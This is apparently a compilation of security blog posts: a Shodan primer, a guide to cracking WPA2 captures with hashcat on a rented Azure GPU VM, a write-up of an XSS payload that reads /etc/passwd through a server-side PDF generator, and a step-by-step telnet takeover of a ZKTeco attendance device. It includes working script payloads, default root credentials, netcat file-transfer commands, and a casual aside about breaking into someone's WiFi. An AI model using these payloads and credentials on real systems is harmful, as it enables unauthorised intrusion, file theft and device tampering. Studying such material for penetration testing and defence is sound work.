Shodan Primer

What is Shodan?

There are tons of web search engines available out there. In our day-to-day lives we use the usual search engines like google, wikipedia, bing etc. which crawls the world wide web and gives us information about websites. But have you ever thought about a search engine that can actually search the devices connected to the internet and give us information about them?!

Perhaps you might have heard of this search engine Shodan? Shodan is a search engine of Internet connected devices. Literally any device connected to the public internet can be searched with this engine. This includes Web Servers, IP Cameras, Smart TVs, Smart Bulbs and other IoT devices and even Industrial Control Systems(ICS)!! You could even look up a power plant on Shodan and gather information regarding it like in what country & city it is located and so on. Shodan can also look up the services running on the devices.

Now this sounds straight away scary, right? Just imagine what a attacker could do if they found your Smart TV on Shodan and they find a telnet service running on it which has some default credentials for authentication?!!! They can get straight away into your network and further pivot and gain access of other devices in your network.

Let’s learn more about Shodan and how we can use it to gain information about our target during our penetration tests.

Using Shodan

When Shodan finds a device connected to the internet directly, it queries it for publicly available information. Most of the data indexed by Shodan is taken from banners. Banners are metadata about the services running on the device.

For example following is the banner displayed when we connect to a SSH server. We can see that the remote system is running Debian and has architecture of 64 bits. The banner also shows the last login time and the IP address from which login was performed.

To be able to make the best use of Shodan, we need to understand the syntax of search. Let’s understand it.

Shodan can be accessed by visiting the URL https://shodan.io.

Although you can search without logging in, but the results would be limited. So creating an account would be better.

Filters are used to search for devices having specific properties. Shodan has various filters like city, country, ip, os etc.

The syntax for filters is “filtername:value”. They can be put in the search bar located on the top left of the website’s interface.

For example, to look up devices present in US, one can put in a filter like country:US

A number of results are displayed in output. Observe how Shodan also nicely sorts the Top cities, Top Services, Top organizations etc. Click on Download Results to download the results you obtained. Shodan also provides ability to create reports which provides nice visual representation of output. This can be done by clicking on create report.

You can also click on a particular result to get detailed information regarding it.

The detailed information is shown which includes information regarding location, organization and ISP. It also displays list of open ports and identifies the services. Further, even the vulnerabilities are shown! Awesome! There is a lot of juicy information out there.

To look up devices part of “One solutions” firm in city Boston, the search query would be org:”One solutions” city:Boston

You can find complete list of filters here: https://github.com/JavierOlmedo/shodan-filters

https://maps.shodan.io/ can be used to search with an interactive map. Following are the results displayed for the query “tomcat

https://images.shodan.io/ shows the screenshots from devices crawled by Shodan.

https://exploits.shodan.io/ can be used search exploits across multiple vulnerability databases.

We can also look at queries shared by other users. Visit the URL https://www.shodan.io/explore to explore the devices & various services connected to the internet.

For instance, clicking on cams shows various security cameras exposed to the internet.

Visiting one of the host gives the login panel of the IP camera.

Anyone on the internet can login to this IP camera and view the camera stream. If the default password has not been changed or a weak login password is used, any one can guess and login.

Real time network monitoring

We can perform real time monitoring of a specified IP or a range of IP addresses using Shodan. Whenever a new service is discovered on that IP, we would get a notification. This can be very handy to monitor your network for any malicious services.

Visit https://monitor.shodan.io/dashboard and click on Setup Network Monitor button. Next give a name & IP(s)/domain and choose whether you would like to be notified by email.

Save it and you will be shown with Manage Assets interface. This allows you to modify trigger rules.

Triggers cause notification to be sent to you whenever the condition is met. Say for instance you’ve enabled the ssl_expired trigger. You will get notification when SSL certificate gets expired.

From the Manage Assets interface it’s also possible to scan that particular IP.

Shodan add-on

Shodan even has a firefox add-on. On installing this in your firefox browser, you can view information about a website when you visit it.

The add-on is available at https://addons.mozilla.org/en-US/firefox/addon/shodan_io/

As can be seen in the above image, the add-on shows the location of the host and the open ports.

This is very useful in information gathering.

Conclusion

Shodan is a very powerful search engine that can show the metadata of any device/service exposed to the public internet. It is a valuable asset when gathering information about the target. It can be used both for offensive & defensive purposes.

It also provides API for various programming languages which can be used to integrate Shodan into your own tools.

The free Shodan account provides limited search features. If you are going to use Shodan a lot then it would be wise to invest in the pro account.

As we saw, it’s so easy for an attacker to look up any device via Shodan and check for the available services. However, you can set up the monitoring on your network using Shodan and enable all the triggers so whenever a new malicious service is started on network and exposed to the internet, Shodan can notify you.

Cracking passwords on the go over cloud cheaply

Hello friends! Often during penetration tests or CTFs or maybe just trying to break into someone’s WiFi, you must have came across a situation where you needed to crack hashes. And if your system does not have a good GPU, I am sure you must have desperately wished you had a powerful GPU that would crack the hash in moments. Even if you have a descent GPU, you need a cooling mechanism if you want to run it for long because the excessive heat generated may damage the GPU.

Did it ever occur to you if all of the cracking process could be handed over to cloud and you can just sit back and relax ?!

Yes! It’s indeed possible. And in fact at a way cheaper cost than you would possibly imagine.

For the purpose of this tutorial, we would be using Azure cloud. And if you are a student Microsoft Azure provides 100$ in credit. You can use these credits to get a virtual machine in cloud.

As you must be aware cracking hashes with use of GPU is way faster than with CPU. Azure provides VMs for various purposes. The N series VMs comes with Nvidia graphics card. They can be used to crack hashes on the go.

Now you must be wondering that buying a VM on cloud, that too one having GPU must have sky-high price. But you would be surprised after seeing the following price estimate. Note that although the monthly price of the machine is quite high, but we just need it for few hours till the password/hash gets cracked, so it’s quite affordable.

I have chosen the NC6 Promo instance in the azure price calculator. The price for 2 hours is just 0.95$. Not even a complete dollar. Amazing!!

Let’s go step by step how to setup VM in cloud from scratch and set everything up.

Firstly, you must either have the Azure credits as previously mentioned or add your Credit Card. Login with your Microsoft account here. https://portal.azure.com

After logging in goto Virtual Machines > Create a Virtual Machine.

You would be presented with various options for the VM configuration. In the resource group select a group if you have previously created already. And if not, then create a new one and choose it. Next, give your virtual machine a name you like. Choose a region you like or you can just keep the default. In the Image part, choose either Ubuntu 16.04 LTS or Ubuntu 18.04 LTS. In size select Standard NC6 PROMO.

You can either use password or choose to login with a key. Set the options accordingly. In management tab, turn off boot diagnostics. Leave the other options as it is and press Review + Create button.

It will take some time for the VM to be deployed. Get yourself a cup of coffee meanwhile and relax.

After the VM is deployed, login with SSH. Check Nvidia graphics card with the following command.

lspci | grep -i NVIDIA

Now we need to install CUDA drivers. Run the following commands in order to install them.

CUDA_REPO_PKG=cuda-repo-ubuntu1604_10.0.130-1_amd64.deb

wget -O /tmp/${CUDA_REPO_PKG} http://developer.download.nvidia.com/compute/cuda/repos/ubuntu1604/x86_64/${CUDA_REPO_PKG} 

sudo dpkg -i /tmp/${CUDA_REPO_PKG}

sudo apt-key adv --fetch-keys https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1604/x86_64/7fa2af80.pub 

rm -f /tmp/${CUDA_REPO_PKG}

sudo apt-get update

sudo apt-get install cuda-drivers

If you get an error in the apt-key command like the one show below, then simply remove the ‘s’ in https to make it http.

The installation will take some time. Once it’s finished reboot the machine with sudo reboot now command.

Reconnect to the VM once rebooted with ssh and type nvidia-smi to check whether the drivers are succesfully installed. If you get the output as follows, you are good to go.

Next, we need to install everyone’s favorite hash cracking tool hashcat. Use the following commands to get it and compile it.

git clone https://github.com/hashcat/hashcat.git

cd hashcat

make

When we perform the benchmark for WPA2 using ./hashcat –benchmark -m 2500, the cracking speed observed is 85765 H/s. Awesome!

Now we will try to crack the password of a cap file captured from a WiFi Access Point. Note that to crack password from cap file with hashcat, it should be converted to hccapx. You can do that here.

You would also need a wordlist to perform a dictionary attack. Download the rockyou.txt with this command.

wget https://www.scrapmaker.com/data/wordlists/dictionaries/rockyou.txt

Once the list is downloaded, you can pass following command to start cracking it. Replace file.hccapx with the name of your own hccapx file.

./hashcat -m 2500 file.hccapx rockyou.txt

The time estimated is seen to be nearly 3 mins. The whole of Rockyou.txt can be tested in just 3 minutes! Mindblowing!!!

And voilà !! In just over a minute we managed to crack the password.

If the password is not cracked by simply providing the rockyou.txt file, pass in rule as follows.

./hashcat -m 2500 hashcat.hccapx rockyou.txt -r rules/best64.rule

The best64 rule performs various combinations with the words in the file. With it, it would take around 4 hours which is still reasonable. The same command would have taken like a day on a average system. Another advantage is you can simply keep it running in the cloud and go do your tasks and come back to see later if it’s cracked.

In this way you can easily crack passwords on the go from anywhere easily. Happy cracking your hashes! 😀

Local File Read Access through XSS in Dynamically Generated Email Template PDF

Hello friends! I am sure you must have came across some interesting and strange vulnerabilities during your penetration tests. Here is one we came across recently.

While testing a web application at eSecurify labs we found an unusual vulnerability.
The web application had templates which could be edited as per requirements. The template editor however, allowed to run javascript code. We exploited it to fetch some sensitive files from the system.

Security test flow

To begin with, the template editor was tested to check if it allows to run javascript code. We used the payload <img src=x onerror=document.write('aaaa')>. This payload is very common to test whether javascript is getting executed.

On saving the changes to the template the code was executed and its output “aaaa” was reflected to the template. So far, so good.

Since the code was getting executed, it led us to wonder if this could be exploited to fetch some sensitive contents from the system and bring it on the web panel. If this was possible it would be quite a critical vulnerability since anything from the system could be read given we had the appropriate privileges for it.

We spent a lot of time to design a working payload which would do the task. Finally, after a complete day’s effort satisfying results were achieved with the final payload.
An AJAX XMLHttpRequest object was used to create a request and the path of “/etc/passwd” was provided to check if it would the reveal the contents of the passwd file from the system.

The following payload was used:
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>

On putting the above payload on the template editor and then saving the template, the changes were saved successfully. However, no output was shown. But also no error was thrown either. This led us to the conclusion that code was getting executed. Now the job was to find where the output would be.

A noteworthy thing to mention is there was an option to download the template as pdf. This seemed interesting. Maybe it had the contents of the “/etc/passwd” file?! Hmmm.
When we downloaded the template and opened it, it indeed had the contents of the “/etc/passwd” file !!!

Next, the “/etc/hosts” file’s contents were fetched by using the same payload and providing path of hosts file like this.
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/hosts");x.send();</script>

This way any arbitrary file from the system could be read by exploiting LFI via Export injection.

The Problem

In the given scenario output encoding mechanism was used to prevent XSS. Thus, original script we inject remained as it is in the database and whenever it renders on web page, output encoding prevented it from executing. However, when the same content was requested by the server side PDF Engine, web application provided the actual unfiltered/unsanitized scripts as a result of which it executed in PDF.

Prevention Strategy

To prevent attacks like this, first and foremost XSS should be prevented which can be done by sanitization of input. But in this case, strict sanitization of input would prevent the users from designing their templates.

Still, tags like <script> and <iframe> could be blacklisted which can help mitigate the issue.

Final Words

If you come across any similar functionality where javascript is getting executed and pdf can be generated, be sure to test for this vulnerability. Adios and happy hacking!

Hacking ZKTeco K40Pro (ZEM510) IoT Device

Hello Friends,

What is the very first thought that comes to your mind when you see  an Attendance Machine ??

Whether you are a student or a professional, the very first thought is Why Why me God… Was there even a need for the so called Office Attendance Machines…??!! The one thing which follows us like our shadow is not our soul mate, twin flame and all but this Attendance machine… Chillax!! IoT devices can be hacked in minutes. Today we are going to hack into one such device – ZKTeco Office Attendance Machine…

Welcome to the realm of Hacking… The future of the hacking lies in IoT hacking. Just as the internet connects people, the Internet of Things connects devices and help them communicate.

Today, We will gain access and change the normal behaviour of this Attendance machine.

IoT Hacking -ZKTeco Office Attendance Machine by Dhaiwat under guidance of Smit Sir

So, Let’s find out whether this “Smart” device is actually smart or not..? 😉 In just ten simple steps Yes…!! You heard it right, In just ten steps we will hack into the system and smartness of the device would be at crucnh.. 😀

The first step is to scan the network and find IP of the device. For this, you can use nmap or Zenmap.

Here  we are using nmap. The attacker IP is 192.168.1.58 and the victims IP is 192.168.1.101.

Now we will do port scanning on victims IP. Port scanning is a technique through which we can find the open ports and target the victim.

Command: Nmap –sV –p- 192.168.1.101 (victims IP)

From the above command, we fetched the output wherein we found that Telnet port is open.

i.e Port no: 23

Telnet Port is open. i.e Port no. 23

In the second step, we will try to connect using default passwords.

Connecting to Telnet using default passwords.

Here is a list of Telnet Default passwords.. 😉

admin:admin

888:manage

manage:888

manage:888

asp:test

888:asp

One of  the combinations which worked for us is root:solokey.

The third step is to check for privileges.

Command to check current user: id

The output of the above command is root.

Checking privileges of user.

Now, in fourth step we will check for running processes to find the process useful for us.

Command ps is used to find running processes.

Here, we found the running processes.

Through this, we found an unusual process. /mnt/mtdblock/main

Fifth step is to get into /mnt/mtdblock

We found the different configuration files.

In /mnt/mdtblock, We found options.cfg which looks like configuration file. What are we waiting for..?? Lets dig into it.

Command: cat file_name. Here options.cfg

Sixth step is to dig into configuration file.

Options.cfg file is important for us.

Here we found some public IPs, ports and user configurations.

Its time to play.

Command: cd wav

ls

In seventh step, we found the wav sound file. This will help us further in changing the behaviour of the smart machine

Number of wav files fetched.

Now through netcat, we will transfer the E_0.wav file.

To do that we started a netcat listener on port 4444 on attackers system, we need to store out put of the command in E_0.wav because when we transfer file via netcat, it only transfers data in raw form.

Here, is the wav file which we got from victim’s system. The monotonous sound of “Thank You” … :((

Command: ncat –lvnp 4444 > E_0.wav

The wav file which we will change is fetched.

Let’s get rid of this boring “Thank You” sound.. Let’s play with the machine..!!! 😉

Now in eight step, we will send the file from victim machine to the attackers system. To do that, use following command on victim system and we will specify E_0.wav file as an input.

Nc 192.168.1.58 4444 < E_0.wav

The file is fetched in attacker’s machine from victim’s machine.

Now, we fetched the file on attackers system. we will use dir command to check filesize.

The size of the file is fetched.

So, now we will generate custom wav file.. 😉

In step number nine, we will generate custom wav file.For that we will use free online website to generate wav file from text and then, rename it to E_0.wav. Lets remove the original file from victim machine using rm command. Now we will start netcat listener on victim machine on port 4444. Now we will save the output of listener in wav file.

Command: nc –lp  4444> E_0.wav

The tenth and the final step is to send our new E_0.wav to victim machine using following command.

Ncat 192.168.1.101 4444  < E_0.wav

The custom wav file is now hosted on victim’s machine.

And bingo, we have changed  the sound of the Attendance machine.

Impact of the IoT device hacking

  • In this case, we are directly getting access of root, meaning we can take full control over it.
  • If the attacker reaches router’s IP through this so called smart device like cameras, attendance machine, Smart Television, he can easily gain credentials of router through rainbow table tool.
  • Once, the attacker has access to router, whole network is under the attacker’s control.

Solution to keep intruders away

  • If you are using the same device at your school, university or work place, the solution to keep away from hackers/attackers is to change the default password of telnet.

Note: “This is for educational purpose only”. The exploiting use of this can land you in legal troubles. Always choose to learn and help other’s rather than landing in any kind of felony.